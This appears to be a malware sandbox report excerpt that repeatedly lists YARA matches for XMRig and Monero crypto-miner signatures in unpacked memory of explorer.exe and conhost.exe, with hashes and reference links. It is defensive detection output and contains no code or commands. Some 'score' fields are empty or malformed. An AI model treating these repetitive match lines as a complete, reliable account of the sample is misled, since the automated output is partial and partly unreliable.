                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.10.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.2.explorer.exe.140000000.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.12.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 17.2.conhost.exe.20190d5ca00.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.12.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.5.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.13.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e882d2d0.7.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 21.2.conhost.exe.224e8d2d308.8.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.13.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.10.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 27.0.explorer.exe.140000000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 28.0.explorer.exe.140000000.4.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 27.0.explorer.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: PUA_WIN_XMRIG_CryptoCoin_Miner_Dec20 date = 2020-12-31, hash1 = b6154d25b3aa3098f2cee790f5de5a727fc3549865a7aa2196579fe39a86de09, author = Florian Roth, description = Detects XMRIG crypto coin miners, reference = https://www.intezer.com/blog/research/new-golang-worm-drops-xmrig-miner-on-servers/
